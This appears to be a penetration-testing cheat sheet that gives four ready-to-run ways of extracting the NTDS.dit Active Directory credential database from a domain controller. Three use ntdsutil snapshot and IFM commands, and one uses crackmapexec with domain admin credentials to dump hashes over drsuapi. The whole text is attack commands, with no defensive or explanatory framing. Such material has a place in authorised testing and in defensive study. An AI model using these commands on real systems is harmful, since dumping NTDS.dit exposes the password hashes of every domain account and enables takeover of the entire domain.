Internal Infrastructure Pentest - Extracting NTDS.DIT File
Method1:
ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit" ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit
Method2:
C:\>ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full c:\pentest ifm: quit ntdsutil: quit
Method3:
ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q
Method4:
crackmapexec.py -u DA_USERNAME -p DA_PASSWORD -d FQDN_DOMAIN DOMAIN_IP --ntds drsuapi